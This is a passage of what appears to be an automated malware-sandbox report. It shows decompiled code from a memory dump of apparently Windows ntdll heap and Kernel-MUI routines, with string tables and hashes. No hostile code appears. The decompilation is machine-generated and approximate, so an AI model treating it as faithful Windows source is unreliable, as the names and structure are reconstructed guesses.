                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          						_push(_t104);
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					E01B3B150("Parameter2: %p\n",  *0x1c258a8);
                                                                                          				}
                                                                                          				_t117 =  *0x1c258ac; // 0x0
                                                                                          				if(_t117 != 0) {
                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          						_push(_t104);
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					E01B3B150("Parameter3: %p\n",  *0x1c258ac);
                                                                                          				}
                                                                                          				_t119 =  *0x1c258b0; // 0x0
                                                                                          				if(_t119 != 0) {
                                                                                          					L41:
                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          						_push(_t104);
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					_push( *0x1c258b4);
                                                                                          					E01B3B150("Last known valid blocks: before - %p, after - %p\n",  *0x1c258b0);
                                                                                          				} else {
                                                                                          					_t120 =  *0x1c258b4; // 0x0
                                                                                          					if(_t120 != 0) {
                                                                                          						goto L41;
                                                                                          					}
                                                                                          				}
                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          					_push(_t104);
                                                                                          					E01B3B150();
                                                                                          				} else {
                                                                                          					E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          				}
                                                                                          				return E01B3B150("Stack trace available at %p\n", 0x1c258c0);
                                                                                          			}












                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                          • API String ID: 0-2897834094
                                                                                          • Opcode ID: 9b8ac5b054cff68160d65669a806eceacb5b164af8d7f5937e8ebdffc555fa35
                                                                                          • Instruction ID: 123f021d6d2499172e61c7da4a6dcccbe1fc5b964ad75e8559ea8d003f01f06e
                                                                                          • Opcode Fuzzy Hash: 9b8ac5b054cff68160d65669a806eceacb5b164af8d7f5937e8ebdffc555fa35
                                                                                          • Instruction Fuzzy Hash: F9610D37970551CFC62DAB8FD584E2573A4EB14A30B0984EEFA0E6F314D7B4D8598B0A
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 96%
                                                                                          			E01B43D34(signed int* __ecx) {
                                                                                          				signed int* _v8;
                                                                                          				char _v12;
                                                                                          				signed int* _v16;
                                                                                          				signed int* _v20;
                                                                                          				char _v24;
                                                                                          				signed int _v28;
                                                                                          				signed int _v32;
                                                                                          				char _v36;
                                                                                          				signed int _v40;
                                                                                          				signed int _v44;
                                                                                          				signed int* _v48;
                                                                                          				signed int* _v52;
                                                                                          				signed int _v56;
                                                                                          				signed int _v60;
                                                                                          				char _v68;
                                                                                          				signed int _t140;
                                                                                          				signed int _t161;
                                                                                          				signed int* _t236;
                                                                                          				signed int* _t242;
                                                                                          				signed int* _t243;
                                                                                          				signed int* _t244;
                                                                                          				signed int* _t245;
                                                                                          				signed int _t255;
                                                                                          				void* _t257;
                                                                                          				signed int _t260;
                                                                                          				void* _t262;
                                                                                          				signed int _t264;
                                                                                          				void* _t267;
                                                                                          				signed int _t275;
                                                                                          				signed int* _t276;
                                                                                          				short* _t277;
                                                                                          				signed int* _t278;
                                                                                          				signed int* _t279;
                                                                                          				signed int* _t280;
                                                                                          				short* _t281;
                                                                                          				signed int* _t282;
                                                                                          				short* _t283;
                                                                                          				signed int* _t284;
                                                                                          				void* _t285;
                                                                                          
                                                                                          				_v60 = _v60 | 0xffffffff;
                                                                                          				_t280 = 0;
                                                                                          				_t242 = __ecx;
                                                                                          				_v52 = __ecx;
                                                                                          				_v8 = 0;
                                                                                          				_v20 = 0;
                                                                                          				_v40 = 0;
                                                                                          				_v28 = 0;
                                                                                          				_v32 = 0;
                                                                                          				_v44 = 0;
                                                                                          				_v56 = 0;
                                                                                          				_t275 = 0;
                                                                                          				_v16 = 0;
                                                                                          				if(__ecx == 0) {
                                                                                          					_t280 = 0xc000000d;
                                                                                          					_t140 = 0;
                                                                                          					L50:
                                                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                                                          					_t242[0x13] = _t140;
                                                                                          					_t242[0x16] = _v40;
                                                                                          					_t242[0x18] = _v28;
                                                                                          					_t242[0x14] = _v32;
                                                                                          					_t242[0x17] = _t275;
                                                                                          					_t242[0x15] = _v44;
                                                                                          					_t242[0x11] = _v56;
                                                                                          					_t242[0x12] = _v60;
                                                                                          					return _t280;
                                                                                          				}
                                                                                          				if(E01B41B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                          					_v56 = 1;
                                                                                          					if(_v8 != 0) {
                                                                                          						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                          					}
                                                                                          					_v8 = _t280;
                                                                                          				}
                                                                                          				if(E01B41B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                          					_v60 =  *_v8;
                                                                                          					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                          					_v8 = _t280;
                                                                                          				}
                                                                                          				if(E01B41B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                          					L16:
                                                                                          					if(E01B41B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                          						L28:
                                                                                          						if(E01B41B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                          							L46:
                                                                                          							_t275 = _v16;
                                                                                          							L47:
                                                                                          							_t161 = 0;
                                                                                          							L48:
                                                                                          							if(_v8 != 0) {
                                                                                          								L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                          							}
                                                                                          							_t140 = _v20;
                                                                                          							if(_t140 != 0) {
                                                                                          								if(_t275 != 0) {
                                                                                          									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                          									_t275 = 0;
                                                                                          									_v28 = 0;
                                                                                          									_t140 = _v20;
                                                                                          								}
                                                                                          							}
                                                                                          							goto L50;
                                                                                          						}
                                                                                          						_t167 = _v12;
                                                                                          						_t255 = _v12 + 4;
                                                                                          						_v44 = _t255;
                                                                                          						if(_t255 == 0) {
                                                                                          							_t276 = _t280;
                                                                                          							_v32 = _t280;
                                                                                          						} else {
                                                                                          							_t276 = L01B54620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                          							_t167 = _v12;
                                                                                          							_v32 = _t276;
                                                                                          						}
                                                                                          						if(_t276 == 0) {
                                                                                          							_v44 = _t280;
                                                                                          							_t280 = 0xc0000017;
                                                                                          							goto L46;
                                                                                          						} else {
                                                                                          							E01B7F3E0(_t276, _v8, _t167);
                                                                                          							_v48 = _t276;
                                                                                          							_t277 = E01B81370(_t276, 0x1b14e90);
                                                                                          							_pop(_t257);
                                                                                          							if(_t277 == 0) {
                                                                                          								L38:
                                                                                          								_t170 = _v48;
                                                                                          								if( *_v48 != 0) {
                                                                                          									E01B7BB40(0,  &_v68, _t170);
                                                                                          									if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          										_t280 =  &(_t280[0]);
                                                                                          									}
                                                                                          								}
                                                                                          								if(_t280 == 0) {
                                                                                          									_t280 = 0;
                                                                                          									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                          									_v44 = 0;
                                                                                          									_v32 = 0;
                                                                                          								} else {
                                                                                          									_t280 = 0;
                                                                                          								}
                                                                                          								_t174 = _v8;
                                                                                          								if(_v8 != 0) {
                                                                                          									L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                          								}
                                                                                          								_v8 = _t280;
                                                                                          								goto L46;
                                                                                          							}
                                                                                          							_t243 = _v48;
                                                                                          							do {
                                                                                          								 *_t277 = 0;
                                                                                          								_t278 = _t277 + 2;
                                                                                          								E01B7BB40(_t257,  &_v68, _t243);
                                                                                          								if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          									_t280 =  &(_t280[0]);
                                                                                          								}
                                                                                          								_t243 = _t278;
                                                                                          								_t277 = E01B81370(_t278, 0x1b14e90);
                                                                                          								_pop(_t257);
                                                                                          							} while (_t277 != 0);
                                                                                          							_v48 = _t243;
                                                                                          							_t242 = _v52;
                                                                                          							goto L38;
                                                                                          						}
                                                                                          					}
                                                                                          					_t191 = _v12;
                                                                                          					_t260 = _v12 + 4;
                                                                                          					_v28 = _t260;
                                                                                          					if(_t260 == 0) {
                                                                                          						_t275 = _t280;
                                                                                          						_v16 = _t280;
                                                                                          					} else {
                                                                                          						_t275 = L01B54620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                          						_t191 = _v12;
                                                                                          						_v16 = _t275;
                                                                                          					}
                                                                                          					if(_t275 == 0) {
                                                                                          						_v28 = _t280;
                                                                                          						_t280 = 0xc0000017;
                                                                                          						goto L47;
                                                                                          					} else {
                                                                                          						E01B7F3E0(_t275, _v8, _t191);
                                                                                          						_t285 = _t285 + 0xc;
                                                                                          						_v48 = _t275;
                                                                                          						_t279 = _t280;
                                                                                          						_t281 = E01B81370(_v16, 0x1b14e90);
                                                                                          						_pop(_t262);
                                                                                          						if(_t281 != 0) {
                                                                                          							_t244 = _v48;
                                                                                          							do {
                                                                                          								 *_t281 = 0;
                                                                                          								_t282 = _t281 + 2;
                                                                                          								E01B7BB40(_t262,  &_v68, _t244);
                                                                                          								if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          									_t279 =  &(_t279[0]);
                                                                                          								}
                                                                                          								_t244 = _t282;
                                                                                          								_t281 = E01B81370(_t282, 0x1b14e90);
                                                                                          								_pop(_t262);
                                                                                          							} while (_t281 != 0);
                                                                                          							_v48 = _t244;
                                                                                          							_t242 = _v52;
                                                                                          						}
                                                                                          						_t201 = _v48;
                                                                                          						_t280 = 0;
                                                                                          						if( *_v48 != 0) {
                                                                                          							E01B7BB40(_t262,  &_v68, _t201);
                                                                                          							if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          								_t279 =  &(_t279[0]);
                                                                                          							}
                                                                                          						}
                                                                                          						if(_t279 == 0) {
                                                                                          							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                          							_v28 = _t280;
                                                                                          							_v16 = _t280;
                                                                                          						}
                                                                                          						_t202 = _v8;
                                                                                          						if(_v8 != 0) {
                                                                                          							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                          						}
                                                                                          						_v8 = _t280;
                                                                                          						goto L28;
                                                                                          					}
                                                                                          				}
                                                                                          				_t214 = _v12;
                                                                                          				_t264 = _v12 + 4;
                                                                                          				_v40 = _t264;
                                                                                          				if(_t264 == 0) {
                                                                                          					_v20 = _t280;
                                                                                          				} else {
                                                                                          					_t236 = L01B54620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                          					_t280 = _t236;
                                                                                          					_v20 = _t236;
                                                                                          					_t214 = _v12;
                                                                                          				}
                                                                                          				if(_t280 == 0) {
                                                                                          					_t161 = 0;
                                                                                          					_t280 = 0xc0000017;
                                                                                          					_v40 = 0;
                                                                                          					goto L48;
                                                                                          				} else {
                                                                                          					E01B7F3E0(_t280, _v8, _t214);
                                                                                          					_t285 = _t285 + 0xc;
                                                                                          					_v48 = _t280;
                                                                                          					_t283 = E01B81370(_t280, 0x1b14e90);
                                                                                          					_pop(_t267);
                                                                                          					if(_t283 != 0) {
                                                                                          						_t245 = _v48;
                                                                                          						do {
                                                                                          							 *_t283 = 0;
                                                                                          							_t284 = _t283 + 2;
                                                                                          							E01B7BB40(_t267,  &_v68, _t245);
                                                                                          							if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          								_t275 = _t275 + 1;
                                                                                          							}
                                                                                          							_t245 = _t284;
                                                                                          							_t283 = E01B81370(_t284, 0x1b14e90);
                                                                                          							_pop(_t267);
                                                                                          						} while (_t283 != 0);
                                                                                          						_v48 = _t245;
                                                                                          						_t242 = _v52;
                                                                                          					}
                                                                                          					_t224 = _v48;
                                                                                          					_t280 = 0;
                                                                                          					if( *_v48 != 0) {
                                                                                          						E01B7BB40(_t267,  &_v68, _t224);
                                                                                          						if(L01B443C0( &_v68,  &_v24) != 0) {
                                                                                          							_t275 = _t275 + 1;
                                                                                          						}
                                                                                          					}
                                                                                          					if(_t275 == 0) {
                                                                                          						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                          						_v40 = _t280;
                                                                                          						_v20 = _t280;
                                                                                          					}
                                                                                          					_t225 = _v8;
                                                                                          					if(_v8 != 0) {
                                                                                          						L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                          					}
                                                                                          					_v8 = _t280;
                                                                                          					goto L16;
                                                                                          				}
                                                                                          			}










































                                                                                          0x01b4406e
                                                                                          0x01b4406e
                                                                                          0x01b44070
                                                                                          0x01b44074
                                                                                          0x01b98351
                                                                                          0x01b98351
                                                                                          0x01b4407a
                                                                                          0x01b4407f
                                                                                          0x01b9835d
                                                                                          0x01b98370
                                                                                          0x01b98377
                                                                                          0x01b98379
                                                                                          0x01b9837c
                                                                                          0x01b9837c
                                                                                          0x01b9835d
                                                                                          0x00000000
                                                                                          0x01b4407f
                                                                                          0x01b43f8a
                                                                                          0x01b43f8d
                                                                                          0x01b43f90
                                                                                          0x01b43f95
                                                                                          0x01b9830d
                                                                                          0x01b9830f
                                                                                          0x01b43f9b
                                                                                          0x01b43fac
                                                                                          0x01b43fae
                                                                                          0x01b43fb1
                                                                                          0x01b43fb1
                                                                                          0x01b43fb6
                                                                                          0x01b98317
                                                                                          0x01b9831a
                                                                                          0x00000000
                                                                                          0x01b43fbc
                                                                                          0x01b43fc1
                                                                                          0x01b43fc9
                                                                                          0x01b43fd7
                                                                                          0x01b43fda
                                                                                          0x01b43fdd
                                                                                          0x01b44021
                                                                                          0x01b44021
                                                                                          0x01b44029
                                                                                          0x01b44030
                                                                                          0x01b44044
                                                                                          0x01b44046
                                                                                          0x01b44046
                                                                                          0x01b44044
                                                                                          0x01b44049
                                                                                          0x01b98327
                                                                                          0x01b98334
                                                                                          0x01b98339
                                                                                          0x01b9833c
                                                                                          0x01b4404f
                                                                                          0x01b4404f
                                                                                          0x01b4404f
                                                                                          0x01b44051
                                                                                          0x01b44056
                                                                                          0x01b44063
                                                                                          0x01b44063
                                                                                          0x01b44068
                                                                                          0x00000000
                                                                                          0x01b44068
                                                                                          0x01b43fdf
                                                                                          0x01b43fe2
                                                                                          0x01b43fe4
                                                                                          0x01b43fe7
                                                                                          0x01b43fef
                                                                                          0x01b44003
                                                                                          0x01b44005
                                                                                          0x01b44005
                                                                                          0x01b4400c
                                                                                          0x01b44013
                                                                                          0x01b44016
                                                                                          0x01b44017
                                                                                          0x01b4401b
                                                                                          0x01b4401e
                                                                                          0x00000000
                                                                                          0x01b4401e
                                                                                          0x01b43fb6
                                                                                          0x01b43eb1
                                                                                          0x01b43eb4
                                                                                          0x01b43eb7
                                                                                          0x01b43ebc
                                                                                          0x01b982a9
                                                                                          0x01b982ab
                                                                                          0x01b43ec2
                                                                                          0x01b43ed3
                                                                                          0x01b43ed5
                                                                                          0x01b43ed8
                                                                                          0x01b43ed8
                                                                                          0x01b43edd
                                                                                          0x01b982b3
                                                                                          0x01b982b6
                                                                                          0x00000000
                                                                                          0x01b43ee3
                                                                                          0x01b43ee8
                                                                                          0x01b43eed
                                                                                          0x01b43ef0
                                                                                          0x01b43ef3
                                                                                          0x01b43f02
                                                                                          0x01b43f05
                                                                                          0x01b43f08
                                                                                          0x01b982c0
                                                                                          0x01b982c3
                                                                                          0x01b982c5
                                                                                          0x01b982c8
                                                                                          0x01b982d0
                                                                                          0x01b982e4
                                                                                          0x01b982e6
                                                                                          0x01b982e6
                                                                                          0x01b982ed
                                                                                          0x01b982f4
                                                                                          0x01b982f7
                                                                                          0x01b982f8
                                                                                          0x01b982fc
                                                                                          0x01b982ff
                                                                                          0x01b982ff
                                                                                          0x01b43f0e
                                                                                          0x01b43f11
                                                                                          0x01b43f16
                                                                                          0x01b43f1d
                                                                                          0x01b43f31
                                                                                          0x01b98307
                                                                                          0x01b98307
                                                                                          0x01b43f31
                                                                                          0x01b43f39
                                                                                          0x01b43f48
                                                                                          0x01b43f4d
                                                                                          0x01b43f50
                                                                                          0x01b43f50
                                                                                          0x01b43f53
                                                                                          0x01b43f58
                                                                                          0x01b43f65
                                                                                          0x01b43f65
                                                                                          0x01b43f6a
                                                                                          0x00000000
                                                                                          0x01b43f6a
                                                                                          0x01b43edd
                                                                                          0x01b43dda
                                                                                          0x01b43ddd
                                                                                          0x01b43de0
                                                                                          0x01b43de5
                                                                                          0x01b98245
                                                                                          0x01b43deb
                                                                                          0x01b43df7
                                                                                          0x01b43dfc
                                                                                          0x01b43dfe
                                                                                          0x01b43e01
                                                                                          0x01b43e01
                                                                                          0x01b43e06
                                                                                          0x01b9824d
                                                                                          0x01b9824f
                                                                                          0x01b98254
                                                                                          0x00000000
                                                                                          0x01b43e0c
                                                                                          0x01b43e11
                                                                                          0x01b43e16
                                                                                          0x01b43e19
                                                                                          0x01b43e29
                                                                                          0x01b43e2c
                                                                                          0x01b43e2f
                                                                                          0x01b9825c
                                                                                          0x01b9825f
                                                                                          0x01b98261
                                                                                          0x01b98264
                                                                                          0x01b9826c
                                                                                          0x01b98280
                                                                                          0x01b98282
                                                                                          0x01b98282
                                                                                          0x01b98289
                                                                                          0x01b98290
                                                                                          0x01b98293
                                                                                          0x01b98294
                                                                                          0x01b98298
                                                                                          0x01b9829b
                                                                                          0x01b9829b
                                                                                          0x01b43e35
                                                                                          0x01b43e38
                                                                                          0x01b43e3d
                                                                                          0x01b43e44
                                                                                          0x01b43e58
                                                                                          0x01b982a3
                                                                                          0x01b982a3
                                                                                          0x01b43e58
                                                                                          0x01b43e60
                                                                                          0x01b43e6f
                                                                                          0x01b43e74
                                                                                          0x01b43e77
                                                                                          0x01b43e77
                                                                                          0x01b43e7a
                                                                                          0x01b43e7f
                                                                                          0x01b43e8c
                                                                                          0x01b43e8c
                                                                                          0x01b43e91
                                                                                          0x00000000
                                                                                          0x01b43e91

                                                                                          Strings
                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 01B43D8C
                                                                                          • WindowsExcludedProcs, xrefs: 01B43D6F
                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 01B43DC0
                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01B43E97
                                                                                          • Kernel-MUI-Language-SKU, xrefs: 01B43F70
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                          • API String ID: 0-258546922
                                                                                          • Opcode ID: efce617da600aaa9f3185dd7a1730829dc1b95072118b41c433f36b91930df37
                                                                                          • Instruction ID: 307ac14d763f1c2ec55d633435c0446ac5699601decf60af28b7da359e5df84f
                                                                                          • Opcode Fuzzy Hash: efce617da600aaa9f3185dd7a1730829dc1b95072118b41c433f36b91930df37
                                                                                          • Instruction Fuzzy Hash: 6FF14D72D01619EFCF19DF98C980AEEBBB9FF08650F1541AAE905E7210D7349E01DBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 29%
                                                                                          			E01B340E1(void* __edx) {
                                                                                          				void* _t19;
                                                                                          				void* _t29;
                                                                                          
                                                                                          				_t28 = _t19;
                                                                                          				_t29 = __edx;
                                                                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                          						_push("HEAP: ");
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					E01B3B150("Invalid heap signature for heap at %p", _t28);
                                                                                          					if(_t29 != 0) {
                                                                                          						E01B3B150(", passed to %s", _t29);
                                                                                          					}
                                                                                          					_push("\n");
                                                                                          					E01B3B150();
                                                                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                          						 *0x1c26378 = 1;
                                                                                          						asm("int3");
                                                                                          						 *0x1c26378 = 0;
                                                                                          					}
                                                                                          					return 0;
                                                                                          				}
                                                                                          				return 1;
                                                                                          			}






                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                          • API String ID: 0-188067316
                                                                                          • Opcode ID: e9aff27ec46c16e0785bd25a5b26fb5b502d35280f2ca38aefccc77eea84d65f
                                                                                          • Instruction ID: 3077ab4139d8d086c17ce78a5601efbe95af81b76c3485b15b7541d4f8e57794
                                                                                          • Opcode Fuzzy Hash: e9aff27ec46c16e0785bd25a5b26fb5b502d35280f2ca38aefccc77eea84d65f
                                                                                          • Instruction Fuzzy Hash: 870170321216419FD72DAB6AE50EF56B7B8DB81F30F1940FEF00547755CBE49441C620
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 70%
                                                                                          			E01B5A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                                          				void* _v5;
                                                                                          				signed short _v12;
                                                                                          				intOrPtr _v16;
                                                                                          				signed int _v20;
                                                                                          				signed short _v24;
                                                                                          				signed short _v28;
                                                                                          				signed int _v32;
                                                                                          				signed short _v36;
                                                                                          				signed int _v40;
                                                                                          				intOrPtr _v44;
                                                                                          				intOrPtr _v48;
                                                                                          				signed short* _v52;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __ebp;
                                                                                          				signed int _t131;
                                                                                          				signed char _t134;
                                                                                          				signed int _t138;
                                                                                          				char _t141;
                                                                                          				signed short _t142;
                                                                                          				void* _t146;
                                                                                          				signed short _t147;
                                                                                          				intOrPtr* _t149;
                                                                                          				intOrPtr _t156;
                                                                                          				signed int _t167;
                                                                                          				signed int _t168;
                                                                                          				signed short* _t173;
                                                                                          				signed short _t174;
                                                                                          				intOrPtr* _t182;
                                                                                          				signed short _t184;
                                                                                          				intOrPtr* _t187;
                                                                                          				intOrPtr _t197;
                                                                                          				intOrPtr _t206;
                                                                                          				intOrPtr _t210;
                                                                                          				signed short _t211;
                                                                                          				intOrPtr* _t212;
                                                                                          				signed short _t214;
                                                                                          				signed int _t216;
                                                                                          				intOrPtr _t217;
                                                                                          				signed char _t225;
                                                                                          				signed short _t235;
                                                                                          				signed int _t237;
                                                                                          				intOrPtr* _t238;
                                                                                          				signed int _t242;
                                                                                          				unsigned int _t245;
                                                                                          				signed int _t251;
                                                                                          				intOrPtr* _t252;
                                                                                          				signed int _t253;
                                                                                          				intOrPtr* _t255;
                                                                                          				signed int _t256;
                                                                                          				void* _t257;
                                                                                          				void* _t260;
                                                                                          
                                                                                          				_t256 = __edx;
                                                                                          				_t206 = __ecx;
                                                                                          				_t235 = _a4;
                                                                                          				_v44 = __ecx;
                                                                                          				_v24 = _t235;
                                                                                          				if(_t235 == 0) {
                                                                                          					L41:
                                                                                          					return _t131;
                                                                                          				}
                                                                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                                          				if(_t251 == 0) {
                                                                                          					__eflags =  *0x1c28748 - 1;
                                                                                          					if( *0x1c28748 >= 1) {
                                                                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                                                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                                                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                                          							if((_t110 & 0xfffff000) != __edx) {
                                                                                          								_t197 =  *[fs:0x30];
                                                                                          								__eflags =  *(_t197 + 0xc);
                                                                                          								if( *(_t197 + 0xc) == 0) {
                                                                                          									_push("HEAP: ");
                                                                                          									E01B3B150();
                                                                                          									_t260 = _t257 + 4;
                                                                                          								} else {
                                                                                          									E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          									_t260 = _t257 + 8;
                                                                                          								}
                                                                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                                          								E01B3B150();
                                                                                          								_t257 = _t260 + 4;
                                                                                          								__eflags =  *0x1c27bc8;
                                                                                          								if(__eflags == 0) {
                                                                                          									E01BF2073(_t206, 1, _t251, __eflags);
                                                                                          								}
                                                                                          								_t235 = _v24;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                                          				if(_t134 == 0) {
                                                                                          					_t210 = _t206;
                                                                                          					_v48 = _t206;
                                                                                          				} else {
                                                                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                          					_v48 = _t210;
                                                                                          				}
                                                                                          				_v5 =  *(_t256 + 2);
                                                                                          				do {
                                                                                          					if(_t235 > 0xfe00) {
                                                                                          						_v12 = 0xfe00;
                                                                                          						__eflags = _t235 - 0xfe01;
                                                                                          						if(_t235 == 0xfe01) {
                                                                                          							_v12 = 0xfdf0;
                                                                                          						}
                                                                                          						_t138 = 0;
                                                                                          					} else {
                                                                                          						_v12 = _t235 & 0x0000ffff;
                                                                                          						_t138 = _v5;
                                                                                          					}
                                                                                          					 *(_t256 + 2) = _t138;
                                                                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                                          						_t141 = 0;
                                                                                          					} else {
                                                                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                                          						_v40 = _t141;
                                                                                          						if(_t141 >= 0xfe) {
                                                                                          							_push(_t210);
                                                                                          							E01BFA80D(_t236, _t256, _t210, 0);
                                                                                          							_t141 = _v40;
                                                                                          						}
                                                                                          					}
                                                                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                                          					 *((char*)(_t256 + 6)) = _t141;
                                                                                          					_t142 = _v12;
                                                                                          					 *_t256 = _t142;
                                                                                          					 *(_t256 + 3) = 0;
                                                                                          					_t211 = _t142 & 0x0000ffff;
                                                                                          					 *((char*)(_t256 + 7)) = 0;
                                                                                          					_v20 = _t211;
                                                                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                                          						_t119 = _t256 + 0x10; // -8
                                                                                          						E01B8D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                                          						_t211 = _v20;
                                                                                          					}
                                                                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                          					if(_t252 == 0) {
                                                                                          						L56:
                                                                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                                          						_t146 = _t206 + 0xc0;
                                                                                          						goto L19;
                                                                                          					} else {
                                                                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                                          							L15:
                                                                                          							_t185 = _t211;
                                                                                          							goto L17;
                                                                                          						} else {
                                                                                          							while(1) {
                                                                                          								_t187 =  *_t252;
                                                                                          								if(_t187 == 0) {
